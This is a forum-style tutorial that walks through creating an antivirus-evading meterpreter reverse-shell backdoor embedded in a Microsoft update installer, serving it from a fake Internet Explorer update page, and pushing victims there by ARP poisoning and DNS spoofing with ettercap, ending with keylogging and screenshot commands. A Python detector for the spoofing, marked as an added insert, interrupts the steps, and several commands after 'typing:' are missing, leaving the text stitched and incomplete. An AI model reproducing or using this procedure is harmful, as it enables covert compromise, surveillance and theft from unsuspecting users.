Hi everybody,
Here is a tutorial on how to create an undetectable meterpreter backdoor and cover it up as an Internet Explorer security update. I created a very basic script that creates the meterpreter backdoor and starts the multi/handler.
I will inject the payload into the Microsoft Windows Malicious Software Removal Tool, which is available for download here.
Download details: Microsoft® Windows® Malicious Software Removal Tool (KB890830)
And I will use ettercap to dns_spoof the victim to the fake Internet Explorer security update page.
Save my script as myscript.sh:
Code:
#!/bin/sh
clear
cd /pentest/exploits/framework3
echo "*************************************"
echo " creating a meterpreter backdoor "
echo "*************************************"
echo -n "lhost ?"
read lhost
echo -n "lport?"
read lport
echo -n "path to output file?"
read filename
echo -n "path to input file?"
read originalfile
echo "creating payload ..."
./msfpayload windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x $originalfile -o $filename
echo "payload created !"
echo "starting multi/handler ..."
./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport E
Make my script executable:
Code:
chmod 755 myscript.sh
Run my script:
Code:
./myscript.sh
lhost => your ip
lport => 5555
output => /root/backdoor.exe
input => /root/windows-kb890830-v3.12
Set up port forwarding:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
Set up etter.dns, located in /usr/share/ettercap:
Code:
nano /usr/share/ettercap/etter.dns
Remove the part where Microsoft is forwarded to Linux and add these lines:
Code:
* A your ip
*.* A your ip
*.*.* A your ip
*.*.*.* A your ip
Create a webpage where you can download the file from or send me a message and I will send you my webpage.
I used Photoshop to edit some pictures I found regarding Internet Explorer. I created a very simple HTML page and added a CSS style sheet to position the download button and to make the webpage look the same at every screen resolution.
Copy all the files into your /var/www/ directory.
Restart apache:
Code:
/etc/init.d/apache2 restart
Activate the DNS spoofing:
Code:
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /victim ip/ /gateway ip/
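From the defender's side, the two steps above leave distinct traces on the victim's network: the wildcard etter.dns entries make many unrelated hostnames resolve to one address, and arp:remote poisoning makes the gateway IP suddenly answer from a different MAC. The following is an added detection example, not code from the original post; its DNS answers and ARP observations are constructed sample records, and the two-label "registrable domain" rule is a deliberate simplification.

```python
"""Detect the two network signatures of the spoofing setup described above:
(1) many unrelated domains resolving to a single A record (wildcard DNS spoofing),
(2) an IP whose MAC binding changes mid-session (ARP poisoning of the gateway).
All sample data below is constructed for this example."""
from collections import defaultdict

# Constructed DNS answers as (queried name, returned A record). Every name but
# the last resolves to the same address, which is what a wildcard entry produces.
SAMPLE_DNS_ANSWERS = [
    ("www.microsoft.com", "192.0.2.10"),
    ("update.microsoft.com", "192.0.2.10"),
    ("www.example.org", "192.0.2.10"),
    ("mail.example.net", "192.0.2.10"),
    ("cdn.example.com", "192.0.2.10"),
    ("www.iana.org", "192.0.2.44"),
]

# Constructed ARP observations as (timestamp, IP, MAC), in arrival order. The
# gateway 192.168.1.1 is seen from one MAC, then from another.
SAMPLE_ARP_OBSERVATIONS = [
    ("10:00:01", "192.168.1.1", "aa:bb:cc:dd:ee:01"),
    ("10:00:02", "192.168.1.20", "aa:bb:cc:dd:ee:20"),
    ("10:00:05", "192.168.1.1", "aa:bb:cc:dd:ee:01"),
    ("10:00:09", "192.168.1.1", "aa:bb:cc:dd:ee:99"),
]


def registrable_domain(name):
    """Approximate the registrable domain by keeping the last two labels.
    Real code would consult the Public Suffix List; this is a simplification."""
    parts = name.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def suspicious_wildcard_ips(answers, min_domains=3):
    """Return {ip: sorted registrable domains} for every IP that answered for at
    least min_domains distinct registrable domains. Legitimate shared hosting can
    trigger this too, so treat hits as leads for review, not verdicts."""
    ip_to_domains = defaultdict(set)
    for name, ip in answers:
        ip_to_domains[ip].add(registrable_domain(name))
    return {ip: sorted(doms) for ip, doms in ip_to_domains.items()
            if len(doms) >= min_domains}


def arp_mac_changes(observations):
    """Return (ip, previous_mac, new_mac, timestamp) for each time an IP is seen
    with a MAC different from the one previously recorded for it."""
    last_seen = {}
    changes = []
    for ts, ip, mac in observations:
        prev = last_seen.get(ip)
        if prev is not None and prev != mac:
            changes.append((ip, prev, mac, ts))
        last_seen[ip] = mac
    return changes


if __name__ == "__main__":
    for ip, doms in suspicious_wildcard_ips(SAMPLE_DNS_ANSWERS).items():
        print(f"possible wildcard spoof: {ip} answers for {len(doms)} domains: {doms}")
    for ip, old, new, ts in arp_mac_changes(SAMPLE_ARP_OBSERVATIONS):
        print(f"possible ARP poisoning at {ts}: {ip} moved from {old} to {new}")
```

On a real host the same functions can be fed from a resolver log or from periodic snapshots of the ARP table; a gateway MAC change combined with every domain collapsing to one address is exactly the pattern this procedure creates.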
Gateway IP can be found by typing this from the terminal:
Now we just have to wait for our victim to run the backdoor. When the victim runs the backdoor you should see something like "session 1 opened". You can see your active sessions by typing:
You can jump into the first session by typing:
Now there are a lot of commands you are able to execute. You can see them all by typing:
A few examples:
Code:
sysinfo => get system info
shell => jump into a cmd shell
keyscan_start => scan for keyboard input
keyscan_dump => dump keyboard input
keyscan_stop => stop scanning
screenshot => take screenshot
upload
download